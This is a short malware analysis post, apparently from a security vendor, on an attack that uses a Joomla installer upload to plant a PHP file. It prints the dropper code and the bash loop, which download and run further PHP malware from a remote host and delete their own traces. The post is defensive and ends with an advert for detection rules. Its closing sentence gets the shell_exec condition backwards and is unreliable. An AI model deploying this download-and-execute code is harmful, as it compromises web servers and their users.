Again we found new malware, that trying using php shell_exec function to download and include more malware to server.
POST Payload
This looks like joomla file upload vulnerability:
--2a2ea832-B-- POST /administrator/index.php?option=com_installer&videw=install HTTP/1.0
Payload trying upload proc.php file to server and execute it:
proc.php
--2a2ea832-C--
Wordpress
<?php
shell_exec("pkill bash 2>&1");
shell_exec("pkill sh 2>&1");
shell_exec("wget hxxp://recaptcha-in.pw/bash/p.sh 2>&1");
shell_exec("nohup bash ./p.sh & 2>&1");
shell_exec("rm p.sh 2>&1");
unlink(__FILE__);
?>
p.sh
It’s trying download p.sh bash script and execute it. When it executed it remove itself and also final remove also proc.php to hiding itself.
while :; do wget -c hxxp://recaptcha-in.pw/bash/xtaccess -O p.php &> /dev/null;
chmod 777 p.php &> /dev/null; php ${PWD}/p.php &> /dev/null;
wget -c hxxp://recaptcha-in.pw/bash/head -O h.php &> /dev/null;
chmod 777 h.php &> /dev/null; php ${PWD}/h.php &> /dev/null; sleep 3600; done
Again it download more malware (p.php & h.php) files and executed them. These infect more php files.
Final words
If server PHP disable_functions include shell_exec function, this is harmfull.
Websites that using Malware Expert – ModSecurity rules are protected against this attack.
Use Malware Expert – Signatures detect this malware from files for FREE!